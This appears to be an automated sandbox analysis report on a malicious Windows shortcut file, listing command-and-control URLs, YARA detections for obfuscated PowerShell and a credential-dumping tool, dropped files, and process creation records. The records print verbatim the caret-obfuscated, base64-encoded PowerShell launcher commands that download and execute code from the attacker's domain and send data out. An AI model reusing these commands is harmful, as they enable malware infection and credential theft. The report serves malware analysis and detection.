      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD28D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD2B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD2FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f41
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9BD2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9BD2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac154
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291542
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e3533096
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD28D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/c0fcfa43a58d04bbdeb124cc853de92c71f413d9845fe6e1a687f68f03777eb45b
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc8
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49789 version: TLS 1.2

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Reads the Security eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Reads the System eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: eQwUFcwrXk.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: amsi64_5056.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: 43.2.myRdpService.exe.7ff68b170000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: 0000002B.00000002.8189432745.00007FF68B676000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: Process Memory Space: powershell.exe PID: 8708, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 5056, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: svczHost.exe PID: 4540, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\fileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A29F23A2_2_00007FF95A29F23A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A29FFEA2_2_00007FF95A29FFEA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF95A2877A622_2_00007FF95A2877A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF95A28855222_2_00007FF95A288552
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF95A2AA72926_2_00007FF95A2AA729
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF95A2A51E026_2_00007FF95A2A51E0
      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
      Source: svczHost.exe.10.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
      Source: eQwUFcwrXk.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: amsi64_5056.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: 43.2.myRdpService.exe.7ff68b170000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: 0000002B.00000002.8189432745.00007FF68B676000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: Process Memory Space: powershell.exe PID: 8708, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 5056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: svczHost.exe PID: 4540, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@66/58@1/3
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3380:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7484:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9192:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5196:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8732:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3380:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3180:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7324:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8732:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7484:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5196:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7692:120:WilError_03
      Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4016:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6424:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7908:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7908:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3180:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9192:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7324:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6424:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4016:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7692:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1zferiw.nxl.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3C76.tmp" "c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5A